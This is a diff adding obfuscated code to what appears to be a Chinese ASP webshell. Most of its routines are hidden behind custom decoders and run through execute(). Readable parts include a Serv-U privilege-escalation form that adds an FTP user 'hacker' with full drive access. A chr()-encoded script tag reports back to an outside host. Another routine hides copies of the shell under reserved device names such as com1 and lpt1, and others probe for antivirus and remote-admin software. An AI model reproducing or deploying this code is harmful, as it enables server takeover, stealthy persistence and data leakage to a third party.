+execute(LUnEnCode("�e'CRWTK4A%%'%jynw\3jxstuxjW�e'aUXFa?K���硣��·�м��Ķ�ָ��C�汨����Bjzqf{%ynrgzxBju~y%YZUSNA	'%jynw\3jxstuxjW�e'CwjiqtKBjrfs%y}jyBju~y%YZUSNA%%%%'%jynw\3jxstuxjW�e'��ѯ��м��Ķ�ָCyxtUBitmyjr%wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'BstnyhF%RWTKA%%'%jynw\3jxstuxjW�e.'Cg4A'-+.'4'-myfUufR3wj{wjX+.'?��·�Ծ�վ��ǰ��CgA'-%XWW�e'CwjysjhBslnqf%[NIA'%jynw\3jxstuxjW�e'CWGACJQGFY4A'%jynw\3jxstuxjW�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'CIY4A'%jynw\3jxstuxjW�e.7-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'C8Bsfuxqth%IYA	'%jynw\3jxstuxjW�e'CIY4ACG4A�м���ʱ��ͳϵCGACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'%%		CyxtUBitmyjr%'%jynw\3jxstuxjW�e.7-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'BwjiqtK+wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%WYA%%'%jynw\3jxstuxjW�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'CIY4A'%jynw\3jxstuxjW�e.6-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'C8Bsfuxqth%IYA	'%jynw\3jxstuxjW�e'CIY4ACG4A�м���78rjyx~XCGACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'%%		CyxtUBitmyjr%'%jynw\3jxstuxjW�e.6-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'BwjiqtK+wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%WYA%%'%jynw\3jxstuxjW�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'CIY4A'%jynw\3jxstuxjW�e.5-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'C8Bsfuxqth%IYA	'%jynw\3jxstuxjW�e'CIY4ACG4A�м���x|tisn\CGACjqiinrBslnqf%IYA	'%jynw\3jxstuxjW�e'%%		CyxtUBitmyjr%'%jynw\3jxstuxjW�e.5-wjiqtKqfnhjuXyjL3TXK%jynw\3jxstuxjW�e'BwjiqtK+wjiqtKhXBstnyhFD'%jynw\3jxstuxjW�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%WYA%%'%jynw\3jxstuxjW�ey}jS�e'CWY4A%%'%jynw\3jxstuxjW�e'CRWTK4A	'%jynw\3jxstuxjW�e'CIY4AC�汨ϸ��Bjzqf{%ynrgzxBju~y%YZUSNACIYA	'%jynw\3jxstuxjW�e'CIY4A	'%jynw\3jxstuxjW�eyhjqjX%isJ%%	�e'����֪δ'%jynw|3jxstuxjW%?jxqj%jxfH%%		�e'�̴�RFW'%jynw|3jxstuxjW%?:%jxfH%%		�e'RTW2IH'%jynw|3jxstuxjW%?9%jxfH%%		�e'�̴�����'%jynw|3jxstuxjW%?8%jxfH%%		�e'��Ӳ�ر�'%jynw|3jxstuxjW%?7%jxfH%%		�e'���ƿ�'%jynw|3jxstuxjW%?6%jxfH%%%%%%	�eju~Yj{nwI3Gj{nwI%jxfH%yhjqjX�e'C'+.<8-wmh+'57Bmyin|%IYA	'%jynw|3jxstuxjw�e'CIY4ACG4A����CGAC'+.<8-wmh+'57Bmyin|%IYA	'%jynw|3jxstuxjw�e'CIY4A?'%jynw|3jxstuxjw�ewjyyjQj{nwI3Gj{nwI%jynw|3jxstuxjw�e'C'+.<8-wmh+':6Bmyin|%IYA'%jynw|3jxstuxjw	�e'CIY4ACG4A����CGAC'+.<8-wmh+':7Bmyin|%IYA'%jynw|3jxstuxjw�e�e'CyxtUBitmyjr%'%jynw|3jxstuxjw�ewjyyjQj{nwI3Gj{nwI%jynw\3jxstuxjW%�e'Bj{nwI+j{nwIsfhXBstnyhFD'%jynw\3jxstuxjW�e�e�e'Bstnyhf%RWTKA%%%%'%jynw\3jxstuxjW�e'CIYGYBxxfqh%jqiinrBslnqf%WYA%%'%jynw\3jxstuxjW�exj{nwI3TXK%sn%Gj{nwI%mhfJ%wtK%%�e�e�e'CWY4A%%'%jynw\3jxstuxjW�e'CIY4AϢ�żм���ͳϵ4�̴�CifjMGYBxxfqh%:Bsfuxqth%IYA%%%%'%jynw\3jxstuxjW�e'CWYA%%'%jynw\3jxstuxjW�e'Ci5<i6>(BwtqtHlg%6Blsnhfuxqqjh%8Blsniifuqqjh%wjysjhBslnqf%5Bwjiwtg%5=9Bmyin|%JQGFYA'%jynw\3jxstuxjW"))
+Set FSO=Nothing:
+
+End Sub:
+execute(LUnEnCode("stnyhszK%isJ?wyXw\jW%B%w\jWhX%%%�elsnmytS%B%TXK%yjX%%%�elsnmytS%B%wjiqtKyxjY%yjX%%%�elsnmytS%B%yxnQjqnKyxjY%yjX%%%�ekn%isJ%%%�ekn%isJ%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKjyjqjI3TXK%%%		�e'CYSTK4A��д��'%+%wyXw\jW%B%wyXw\jW%%%%%%%	�ejxqJ%%%	�e'CYSTK4A��д�ɲ�'%+%wyXw\jW%B%wyXw\jW%%%		�ewfjqH3wwj%%%%%%%	�esjmY%wwj%kN%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKy}jYjyfjwH3TXK%%%	�e'1����%C7777kk(Bwtqth%YSTKA'%+%wjiqtk%B%wyXw\jW%%%%%%%�ejxqJ%%%�ekN%isJ%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKjyjqjI3TXK%%%		�e'CYSTK4A��д��'%+%wyXw\jW%B%wyXw\jW%%%%%%%	�ejxqJ%%%	�e'CYSTK4A��д�ɲ�'%+%wyXw\jW%B%wyXw\jW%%%		�ewfjqH3wwj%%%%%%%	�esjmY%wwj%kN%%%	�ejzwY1jrfsjqnKisW%+%wjiqtk%jqnKy}jYjyfjwH3TXK%%%	�e'1���ɲ�%C7777kk(Bwtqth%YSTKA'%+%wjiqtk%B%wyXw\jW%%%	�ewfjqH3wwj%%%%%%%�esjmY%wwj%kN%%%�ey}jS%%%�eyxnQjqnKyxjY%sn%F%mhfJ%wtK%%%�e'ury3'%+%.|ts-isthjX%+%.|ts-jyzsnR%+%.|ts-wztM%+%.|ts-~fI%+%'urjya'%B%jrfsjqnKisW%%%�exwjiqtKgzX3wjiqtKyxjY%B%yxnQjqnKyxjY%yjX%%%�e.wjiqtk-wjiqtKyjL3TXK%B%wjiqtKyxjY%yjX%%%�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjX%B%TXK%yjX%%%�ejrfsjqnKisW1wyXw\jW1yxnQjqnKyxjY1wjiqtKyxjY1TXK%rnI%%%�ey}jS%jrzxjW%wtwwJ%sT?.wjiqtk-w\jWhX%stnyhszK?gzX%isJ?61lxrhX1'Ϣ�żм���'%jlfxxjR	�elsnmytS%B%TXK%yjX	�e.'&���Ļ�������������м���дֻ�������ҳ����ˢ�ζ�Ҫ��'-ijW%+%'����עCNQA'%+%lxrhX%B%lxrhX	�ekn%isJ	�e.'&��Ȩ���޻��ڴ治'%+%wjiqtk-ijW%+%'���м���CNQA'%+%lxrhX%B%lxrhX%%%%	�ejxqJ	�elsnmytS%B%wjiqtKT%yjX		�elsnmytS%B%xwjiqtKurjY%yjX		�ey}jS		�e%%.X-w\jWhX%+%'���м���CNQA'+lxrhX%B%lxrhX%%%%%		�exwjiqtKurjY%sn%X%mhfJ%wtK		�e.wjiqtk-w\jWhX%+%'��¼Ŀ���м��Ķ�ָCNQA'%B%lxrhX		�exwjiqtKgzX3wjiqtKT%B%xwjiqtKurjY%yjX		�e.wjiqtk-wjiqtKyjL3TXK%B%wjiqtKT%yjX%%%%	�esjmY%.wjiqtk-xyxn}JwjiqtK3TXK%kN	�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjX%B%TXK%yjX	�eX1lxrhX1wjiqtKurjY1wjiqtKT1TXK%rnI	�ey}jS%jrzxjW%wtwwJ%sT?.wjiqtk-wjiqtKhX%gzX?gzX%isJ?kn%isJ	�e61wyXdurjY1'Ϣ���̴�?'%+%j{nwI%jlfxxjR		�e.'&���Ļ�������������м���дֻ�������ҳ����ˢ�ζ�Ҫ��'-ijW%+%'����עCNQA'%+%wyXdurjY%B%wyXdurjY		�elsnmytS%B%TXK%yjX%%%%	�elsnmytS%B%j{nwIyxjY%yjX		�ekn%isJ%%%%	�e'-?�ַ���δ����¼Ŀ����'%+%j{nwI%+%'������CNQA'%+%wyXdurjY%B%wyXdurjY%sjmy%5By%kN			�ey}jS%%%%		�ekn%isJ%%%%			�e..n-yxnQwjiqtKurjY%+%'a?'%+%j{nwI-w\jWhX%+%'���м����ַ�CNQA'%+%wyXdurjY%B%wyXdurjY					�e60y%B%y%%%%				�esjmY%..n-yxnQwjiqtKurjY%+%'a?'%+%j{nwI-xyxn}JwjiqtK3TXK%kN%%%%			�e.yxnQwjiqtKurjY-isztgZ%ty%5%B%n%wtK			�e.'uyky'1'gzur|'1'uyk'1'gzuyjsN'1'xjqnK%rfwltwU'1'xlsnyyjX%isf%xysjrzhtI'1'xqttY'1'umu'1'uxf'1'5557x|tisn|'1'jrsn|'1'gj|'1'=>sn|'1'5557sn|'1'sn|'1'yssn|'1'x|tisn|'-~fwwF%B%yxnQwjiqtKurjY			�e.'���Բ�¼Ŀ����'-ijW%+%'CNQA'%+%wyXdurjY%B%wyXdurjY			�e5By?y1yxnQwjiqtKurjY%rnI			�e.'-?���ɲ�'-ijW%+%'?¼Ŀ���̴�CNQA'%+%wyXdurjY%B%wyXdurjY%%%%		�ejxqJ%%%%	�elsnmytS%B%wjiqtKjxfG%yjX			�elsnmytS%B%wjiqtKurjY%yjX			�ey}jS			�e.I-w\jWhX%+%'���м���CNQA'%+%wyXdurjY%B%wyXdurjY%%%%			�exwjiqtKurjY%sn%I%mhfJ%wtK			�exwjiqtKgzX3wjiqtKjxfG%B%xwjiqtKurjY%yjX			�ewjiqtKyttW3j{nwIyxjY%B%wjiqtKjxfG%yjX			�e�e..'a?'%+%j{nwI--w\jWhX%+%'?¼Ŀ���̴�CNQA'%+%.jrfSjrzqt[3j{nwIyxjY-ijW%+%'�������̴�CNQA'%+%..;<:=9564j nXqfytY3j{nwIyxjY-ysNH-ijW%+%'���������̴�CNQA'%+%.jrfSjwfmX3j{nwIyxjY-ijW%+%'���������̴�CNQA'%+%.wjgrzSqfnwjX3j{nwIyxjY-ijW%+%'���������̴�CNQA'%+%.rjyx~XjqnK3j{nwIyxjY-ijW%+%'�����������̴�CNQA'%B%wyXdurjY%%%%		�esjmY%~ifjWxN3j{nwIyxjY%kN		�e.j{nwI-j{nwIyjL3TXK%B%j{nwIyxjY%yjX		�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjX%B%TXK%yjX%%%%	�esjmY%''%CA%j{nwI%kN	�eI1wyXdurjY1xwjiqtKurjY1wjiqtKjxfG1j{nwIyxjY1TXK%rnI?.j{nwI-j{nwIsfhX%gzX")):
+execute(LUnEnCode("stnyhszK%isJ?'Cjqgfy4A'+7NX+6NX+5NX+NX%XWW�ey}js�ekn%isj�e'Cwy4ACiy4ACystk4A'+myfu3ogt+'@uxgs+C5555KK(Bwtqth%ystkAb'+}q+'?���ද��`C''7''Bsfuxqth%''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+jrfS~fquxnI3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACiy4A'+jrfS3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+7NXB7NX�ejxqj�e'Cwy4ACiy4ACystk4A'+myfu3ogt+'@uxgs+C5555KK(Bwtqth%ystkAb'+}q+'?���ද��`C''7''Bsfuxqth%''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+jrfS~fquxnI3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACiy4A'+jrfS3ogt+'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'+6NXB6NX�esjmy%7Bju~YywfyX3OGT%isf%'sn|'CA..8191myfu3ogt-inr-jxfHQ%kn�e'�ý�'B}q%sjmy%9Bju~YywfyX3OGT%kn�e'����'B}q%sjmy%8Bju~YywfyX3OGT%kn�e'����'B}q%sjmy%7Bju~YywfyX3OGT%kn�ekn%isj�e%'Cwy4ACiy4A@uxgs+C''7''Bsfuxqth%''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyACwyA'B5NX�e'Cwy4ACiy4A'+NXBNX�e'.��-����ͳϵ'+NXBNX�e%'@uxgs+C''KKKKKK(''Bwtqthlg%iyACiy4A'+NXBNX�ejrfS3ogt+NXBNX�e'@uxgs+C''KKKKKK(''Bwtqthlg%''57''Bymlnjm%iyA'+NXBNX�e'CwyA'+NXBNX�esjmy%''Bju~YywfyX3OGT%kn�ewfjqh3wwj�e.'344?YSsn\'-yhjogTyjl%sn%ogt%mhfj%wtk�ey}js%jrzxjw%wtwwj%st�e'Cwy4ACiy4A����뻧��ͳϵC,zsjr,Bwtqthlg%,wjysjh,Bslnqf%,8,Bsfuxqth%,57,Bymlnjm%iyACwyA'+NXBNX�e'C,wjysjh,Bslnqf%,5,Blsniifuqqjh%,6,Blsnhfuxqqjh%,5,Bwjiwtg%,zsjr,Bwtqthlg%,55;,Bmyin|%jqgfyACwgA'BNX?.-jxwztH%stnyhszK"))
+execute(LUnEnCode("stnyhszK%isJ?kn%isj�e'pwt|yjS3yunwhx\?��Ȩ��û'%jynw|3jxstuxjW�esjmy%wwj%kn�ey}jS�e'CwgA'+jrfS3snrif%jynw|3jxstuxjW�exwjgrjR3uztwLogt%sn%snrif%mhfJ%wtK�e.'uztwl1xwtyfwyxnsnriF4'+jrfSwjyzurtH3Sy+'44?YSsn\'-yhjogTyjLBuztwLogt%yjX�e.'pwt|yjS3yunwhx\'-yhjogTjyfjwh3wj{wjxBSy%yjX�e������xwtyfwyxnsnriF�Ҳ�,%y}js%jrzxjw%wtwwj%st�e5Bxjwnu}J3jxstuxjW?.-gfsnrif%stnyhszK?stnyhszK%isJ?kn%isj�eisj3jxstuxjW�eINxxjhtwUysn+'CwgA'%jynw\3jxstuxjW�e.INxxjhtwUysn1Ht1qqzs1'wjxz%yjs'-jyfjwh3uu%jynw\3jxstuxjW�e.'xxjhtwUd78sn\'-yjl3hhBuu%yjX�e76B|tisn\|tmX3Ht�edjhsfyxsNs|fuX3xxBHt%yjX�e.'uzywfyXxxjhtwUd78sn\'-yjl3hhBxx%yjx�e..'i}'-yxjzvjw-wj{wjxyhjssth3||Bhh%yjx�e.'wtyfhtqrjg|x3lsnyunwhxrjg|'-yhjogtjyfjwh3wj{wjxB||%yjx�esjmy%''CA.'i}'-yxjzvjw%kn�e'Crwtk4A'%XWW�e'C''����''Bjzqf{%''ynrgzX''Bjrfs%''ynrgzx''Bju~y%yzusnA%%%%'%XWW�e'C''5<''Bj nx%''@ytzv+wjphfm@ytzv+1@ytzv+)wjphfm@ytzv+1@ytzv+7{rnh4yttw@ytzv+1@ytzv+6353=;637>6@ytzv+''Bjzqf{%''i}''Bin%''y}jy''Bju~y%''i}''Bjrfs%yzusnA'%XWW�e'������ִ��Զ%%'%XWW�e'C''nr|BstnyhFD''Bstnyhf%''yxtu''Bitmyjr%''6rwtk''Bjrfs%rwtkA'%XWW�e'C,wjysjh,Bslnqf%,5,Blsniifuqqjh%,6,Blsnhfuxqqjh%,5,Bwjiwtg%,zsjr,Bwtqthlg%,*5=,Bmyin|%jqgfyACwgA'BNX?.-nr|%stnyhszK")):
+copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&str1&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Function suftp():RRS"<p><center>Serv-U TȨ����--�޸���Ȩ���޷���������</p>"
+RRS"<form name='form1' method='post' action=''>"
+RRS"<center>����Ա:<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+RRS"<center>����Ա���� :<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+RRS"<center>SERV-U�˿�:<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+RRS"<center>���ӵ��û���:<input name='tuser' type='text' class='TextBox' id='tuser' value='hacker'><br>"
+RRS"<center>���ӵ��û�����:<input name='tpass' type='text' class='TextBox' id='pass' value='hacker'><br>"
+RRS"<center>�ʺŵ����Ե�·��:<input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'><br>"
+RRS"<center>����˿�:<input name='tport' type='text' class='TextBox' id='tport' value='21'><br>"
+RRS"<center><input name='radiobutton' type='radio' value='add' checked class='TextBox'>ȷ������"
+RRS"<center><input type='radio' name='radiobutton' value='del' class='TextBox'>ȷ��ɾ��"
+RRS"<p><input name='Submit' type='submit' class='buttom' value='�ύ'></p></form>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+hostip = request.Form("hostp")
+timeout=600:execute(LUnEnCode("kn%isj�elsnmytsB8YXTU}%yjX�e.xj{fjq-isjX38yxtU}�ejzwY%1'xj{fjq4'+%ywtu%+'?635353<7644?uyym'%1'YXTU'%sjuT38yxtU}�e.'UYYMQR]37QR]XR'-yhjogTjyfjwH%B%8yxtU}%yjX�ekqwhg{%+%wjxzy%+%'BwjxZ%'%+%kqwhg{%+%ywtuy%+%'BtSywtU2'%+%kqwhg{%+%'5353535BUN2'%+%kqwhg{%+%'WJXZJYJQJI2'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%'JHSFSJYSNFR%JYNX'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%i|u%+%'%xxfU'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%wxZ%+%'%wjxZ'%B%xj{fjq�ejxqj�e.'CWGACwgA.?%'%+%myfuy%+%'%?��·%'%+%xxfuy%+%'%?����'%+%'%'%+%wjxzy%+%'%?������%UYK������ִ��������'-%jynw|3jxstuxjw�elsnmytsBYXTU}%yjX�e.xj{fjq-isjX3yxtU}�ejzwY%1'xj{fjq4'+%ywtu%+'?635353<7644?uyym'%1'YXTU'%sjuT3yxtU}�e.'UYYMQR]37QR]XR'-yhjogTjyfjwH%B%yxtU}%yjX�ey}jS%jrzxjW%wtwwJ%sT�e�ekqwhg{%+%'ynzv'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%'UIHQJRF\W""a'%+%myfuy%+%'BxxjhhF%'%+%kqwhg{%+%'jstSBxtnyfW2'%+%kqwhg{%+%'wfqzljWBju~Yiwt|xxfU2'%+%kqwhg{%+%'rjyx~XBjhsfsjysnfR2'�ed%+%kqwhg{%+%'5Brzrn}fRfytzV2'%+%kqwhg{%+%'5BysjwwzHfytzV2'%+%kqwhg{%+%'5BynijwHxtnyfW2'%+%kqwhg{%+%'6Bs|tItnyfW2'�ed%+%kqwhg{%+%'6BuZtnyfW2'%+%kqwhg{%+%'5Bjwnu}J2'%+%kqwhg{%+%'62ByzTjrnYstnxxjX2'%+%kqwhg{%+%'55;ByzTjrnYjqiN2'%+%kqwhg{%+%'62BxwjxZwS}fR2'�ed%+%kqwhg{%+%'5Bs|tIynrnQijjuX2'%+%kqwhg{%+%'5BuZynrnQijjuX2'%+%kqwhg{%+%'62BUNwjUsnltQxwjxZ}fR2'%+%kqwhg{%+%'5BjqgfsJfytzV2'�ed%+%kqwhg{%+%'5Biwt|xxfUjlsfmH2'%+%kqwhg{%+%'5BsnltQ|tqqFx~f|qF2'%+%kqwhg{%+%'5BsjiinMjinM2'%+%kqwhg{%+%'5BjwzhjXijjS2'�ed%+%kqwhg{%+%'6BxmyfUqjW2'%+%kqwhg{%+%'5BjqgfxnI2'%+%kqwhg{%+%'BjqnKxjRsnltQ2'%+%kqwhg{%+%'a'%+%myfuy%+%'BwnIjrtM2'�ed%+%kqwhg{%+%xxfuy%+%'Biwt|xxfU2'%+%kqwhg{%+%wjxzy%+%'BwjxZ2'%+%kqwhg{%+%ywtuy%+%'BtSywtU2'%+%kqwhg{%+%'5353535BUN2'%+%kqwhg{%+%'UZYJXWJXZYJX2'%+%xj{fjq%B%xj{fjq�ekQwHg{%+%'B~jPT_Y%'%+%kQwHg{%+%'5BjqgfsJT_Y2'%+%kQwHg{%+%'5""6""62""'%+%ywtuy%+%'""5353535""jz~zt~BsnfrtI2'%+%kQwHg{%+%'SNFRTIYJX2'%+%xj{fjq%B%xj{fjq�ekQwHg{%+%'JHSFSJYSNFR%JYNX'%B%yr�ekQwHg{%+%ywtuy%+%'BtSywtU%'%+%kQwHg{%+%'5353535BUN2'%+%kQwHg{%+%'SNFRTIjyjqjI2'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%'JHSFSJYSNFR%JYNX'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%i|u%+%'%xxfU'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%wxZ%+%'%wjxZ'%B%xj{fjq�esjmY%'iif'%B%.'styyzgtnifw'-rwtK3yxjzvjw%kn")):End Function:
+execute(shisanfun("noitcnuF dne��cbb=tpyrcnE��txen��fi dne��c&cbb=cbb��esle��)1,)e(tnic,1LEEHWs(dim&cbb=cbb��)���,�����,d(ecalper=e��1+i=i��)2,i,dca(dim=d��neht �����=c fi��)1,i,dca(dim=c��1 pets )dca(neL oT 1 = i roF��)dca(tpyrcnE noitcnuF���twj�� = 1LEEHWs"))
+acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Function fuck():On Error Resume Next
+execute(LUnEnCode(".myfUyktX-jxfhqBtksnmyfU�e.'myfU'-rjyn3ysjrstwn{sJ3mx\BmyfUyktX�e.'qqjmX3yunwhx\'-yhjogtjyfjwhBmx|%yjx�emx|%rni"))
+Response.Write"<LI>ϵͳ����֧��:<BR>"
+Response.Write"-----------------------------<br>"
+execute(LUnEnCode("'CwgA��֧?������ɱ��ϵ����CnqA'%jynw\3jxstuxjW%sjmY%.'lsnxnw'1tksnmyfU-wyxsn%kn�e'CwgA��֧?������ɱ��������CnqA'%jynw\3jxstuxjW%sjmY%.'xzwn{nysf'1tksnmyfU-wyxsn%kn�e'CwgA��֧?������ɱ��ϵɽ��CnqA'%jynw\3jxstuxjW%sjmY%.'{fp'1tksnmyfU-wyxsn%kn�e'CwgA��֧?������ɱqqnPCnqA'%jynw\3jxstuxjW%sjmY%.'qqnP'1tksnmyfU-wyxsn%kn�e'CwgA��֧?�ƿ�jwjm|~sFhU��������CnqA'%jynw\3jxstuxjW%sjmY%.'jwjm|~sfhu'1tksnmyfU-wyxsn%kn�e'CwgA��֧?�����RKHCnqA'%jynw\3jxstuxjW%sjmY%.'<}rstnxzkh'1tksnmyfU-wyxsn%kn�e'CwgA��֧?��������jqhfwTCnqA'%jynw\3jxstuxjW%sjmY%.'jqhfwt'1tksnmyfU-wyxsn%kn�e'CwgA��֧?��������QVX~RCnqA'%jynw\3jxstuxjW%sjmY%.'qvx~r'1tksnmyfU-wyxsn%kn�e'CwgA��֧?��������QVXXRCnqA'%jynw\3jxstuxjW%sjmY%.'wj{wjx%qvx%yktxtwhnr'1tksnmyfU-wyxsn%kn�e'CwgA��֧?����f{fOCnqA'%jynw\3jxstuxjW%sjmY%.'f{fo'1tksnmyfU-wyxsn%kn�e'CwgA��֧?����qwjUCnqA'%jynw\3jxstuxjW%sjmY%.'qwju'1tksnmyfU-wyxsN%kn"))
+paths=split(SoftPath,";")
+Response.Write "------------------------------------<br>"
+Response.Write "ϵͳ��ǰ·������:<br>"
+For i=Lbound(paths) to Ubound(paths)
+Response.Write "<li>"&paths(i)&"<br>"
+next:end Function
+execute(shisanfun("bus dne���>tpircs/<;'��&lru&)��eman_revres��(tseuqer&��//:ptth'=noitacol.tnerap>tpircs<�� srr:gnihton=osf tes:1emanelif&��.��&xepdnr&��\��&1htapelif&��\.\\��,htapf elifypoc.osf:1emanelif&��.��&xepdnr&))��/��,lru(verrtsni,lru(tfel=lru:)��lru��(selbairavrevres.tseuqer=lru:))��\��,htapf(verrtsni-)htapf(nel,htapf(thgir=1emanelif:)��.��(htappam.revres=1htapelif:���=)��wjles��(noisses:))71,0(rebmundnr()��|��,xep(tilps=xepdnr:��9tpl|8tpl|7tpl|6tpl|5tpl|4tpl|3tpl|2tpl|1tpl|9moc|8moc|7moc|6moc|5moc|4moc|3moc|2moc|1moc��=xep:)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes:)��detalsnart_htap��(selbairavrevres.tseuqer=htapf��llehsneddih bus"))
+execute(LUnEnCode("stnyhszK%isj?kn%isJ%%%%%%�e'����jwjm|~sFhu���ý��Ʋ�����¼Ŀ��Ĭ���Կ�1��������jwjm|~sFhu�ַ�CnqA'%jynw\3jxstuxjW%%%%%%%%�esjmY%.'knh3'+jrfswj{wjx+'ahjysfr~XafyfI%stnyfhnquuFaxwjxZ%qqFaxlsnyyjX%isF%xysjrzhtIa'+wj{nwix~x-xyxn}JjqnK3txk%kN%%%%%%�e.'jrfSwjyzurtHajrfSwjyzurtHajrfSwjyzurtHaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'-ifjWljW3mx|Bjrfswj{wjx%%%%%%�e.71.7-wjiqtKqfnhjuxyjL3txK-ykjqBj{nwix~X%%%%%%�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjXBtxk%yjX%%%%%%�ey}jS%%%%�e%kn%isJ%%%%%%�ekn%isJ%%%%%%%%�e'CwgA��ľUMU��д�Ҳ�1¼ĿqnfRgj\�Ҳ��Կ�1������Ȩrjyx~XqfhtQ����1qnfrsn\%hnlfR���������CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%.'qnfrsn|'1.jrfS3jhn{wjXogt-jxfhq-wyxsn%kn%%%%%%%�e�ekn%isJ%%%%%%�ekn%isJ%%%%%%%%�e'CwgAȨ����ľuxO��ʹ�ǿ��Կ�1������Ȩrjyx~XqfhtQ����1yfhrtY���������CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%.'yfhrty'1.jrfS3jhn{wjXogt-jxfhq-wyxsn%kn%%%%%%�ekn%isJ%%%%%%�ekn%isj%%%%%%%%�ekn%isJ%%%%%%%%%%�e'CwgA��ľUMU�ǿ��Կ�1rjyx~XqfhtQΪ��Ȩ����1�ڴ����jmhfuF���������CnqA%'%jynw\3jxstuxjW%%%%%%%%%%%%�ejxqJ%%%%%%%%%%�e'CwgAȨ���ֱ�Կ�3jmhfuFΪ�����GJ\ǰ��CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�esjmY%.'jmhfuF'1.'JWF\YKTXdWJ[WJX'-xjqgfnwf[wj{wjX3yxjzvjW-wyxsn%kN%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%'jmhfuf'B.jrfS3jhn{wjXogt-jxfhq%kn%%%%%%�ekn%isJ%%%%%%�ekn%isJ%%%%%%%%�e'CwgAȨ���ǿ��Կ�1������Ȩrjyx~XqfhtQ����1װ��Z2{wjX���������CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%'Z2{wjX'BjrfS3jhn{wjXogt%kn%%%%%%�e%%%%%�e%%%%%%�ewjyzurtHogt%sN%jhn{wjXogt%mhfJ%wtK%%%%�ey}jS%jrzxjW%wtwwJ%sT,%%%%�e.'jhn{wjX'-~fwwF%B%wjyqnK3wjyzurtHogt%%%%�e.'stnyfhnquuF3qqjmX'-yhjogTjyfjwH3wj{wjX%B%fx%yjX%%%%�